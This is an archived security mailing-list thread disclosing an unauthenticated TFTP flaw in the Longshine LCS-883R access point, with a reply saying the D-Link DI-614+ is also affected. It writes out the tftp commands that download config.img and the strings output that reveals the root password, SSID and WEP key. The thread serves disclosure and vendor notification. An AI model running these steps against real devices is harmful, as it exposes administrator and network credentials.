PDA

Bekijk Volledige Versie : Longshine WLAN Access-Point LCS-883R VU#310201



Lukas Grunwald
06/01/03, 20:30
Hardware: Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps

Software: ThreadX ARM7/Green Hills Version G3.0f.3.0c from Express Logic Inc.

Description: Get Superuser Privileges and view the devices password and password and other passwords

Versions affected: tested with 03.01.0b and 03.01.0h

Vendor contacted: e-mailed Longshine at Sun Dec 29

Details: You are able to connect via tftp to the access-point an you can get download the configuration
without authentication the WEP Secret for the encryption and the password from your radius server is also readable.
In this configuration in the Username of the Superuser and the corresponding password stored.
The WEP Secret for the encryption and the password from your radius server is also readable.
This "attack" works via WLAN (!!!) and Ethernet.

tftp
tftp> connect 192.168.108.48
tftp> get config.img
Received 780 bytes in 1.0 seconds
tftp> quit

[~]/-\>strings config.img
DNXLABAP01 <- name of the AP
root <- name of the superuser
XXXXXX123 <- password from superuser
DNXLABLAN <- ssid
secu9 <- secret for WEP
7890abcdef <-

You are also able to get the following files:

config.img
wbtune.dat
mac.dat
rom.img
normal.img


Solution: after contact with the vendor he claims that a new firmware-upgrade
fixes this problem, but the latest available firmware on his web-page
dosn't fix it anyway.

Vendor-Contact:

LONGSHINE Technologie (Europe) GmbH

An der Strusbek 9
D-22926 Ahrensburg

Tel: ++ 49 ( 0 ) 4102 / 4922- 0
Fax: ++ 49 ( 0 ) 4102 / 40109

support@longshine.de
--
Regards
Lukas Grunwald aka REG lg1

DN-Systems Enterprise Internet Solutions GmbH

heydowns@borg.com
07/01/03, 04:12
This vulnerability is also an issue on the popular DLink DI-614+ (which I
think is based upon the Longshine product). I was able to grab config.img
and also extract the "admin" password from it. This was confirmed with
firmware version 2.03 dated 9/10/2002.

On the DLink product, you can only perform this from the "LAN-side" of the
device in the default configuration.

DLink has version 2.10 available, dated 11/25/2002, but I have not tried
it yet.

-Jeff

On Mon, 6 Jan 2003, Lukas Grunwald wrote:

>
>
> Hardware: Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps
>
> Software: ThreadX ARM7/Green Hills Version G3.0f.3.0c from Express Logic Inc.
>
> Description: Get Superuser Privileges and view the devices password and password and other passwords
>
> Versions affected: tested with 03.01.0b and 03.01.0h
>
> Vendor contacted: e-mailed Longshine at Sun Dec 29
>
> Details: You are able to connect via tftp to the access-point an you can get download the configuration
> without authentication the WEP Secret for the encryption and the password from your radius server is also readable.
> In this configuration in the Username of the Superuser and the corresponding password stored.
> The WEP Secret for the encryption and the password from your radius server is also readable.
> This "attack" works via WLAN (!!!) and Ethernet.
>
> tftp
> tftp> connect 192.168.108.48
> tftp> get config.img
> Received 780 bytes in 1.0 seconds
> tftp> quit
>
> [~]/-\>strings config.img
> DNXLABAP01 <- name of the AP
> root <- name of the superuser
> XXXXXX123 <- password from superuser
> DNXLABLAN <- ssid
> secu9 <- secret for WEP
> 7890abcdef <-
>
> You are also able to get the following files:
>
> config.img
> wbtune.dat
> mac.dat
> rom.img
> normal.img
>
>
> Solution: after contact with the vendor he claims that a new firmware-upgrade
> fixes this problem, but the latest available firmware on his web-page
> dosn't fix it anyway.
>
> Vendor-Contact:
>
> LONGSHINE Technologie (Europe) GmbH
>
> An der Strusbek 9
> D-22926 Ahrensburg
>
> Tel: ++ 49 ( 0 ) 4102 / 4922- 0
> Fax: ++ 49 ( 0 ) 4102 / 40109
>
> support@longshine.de
>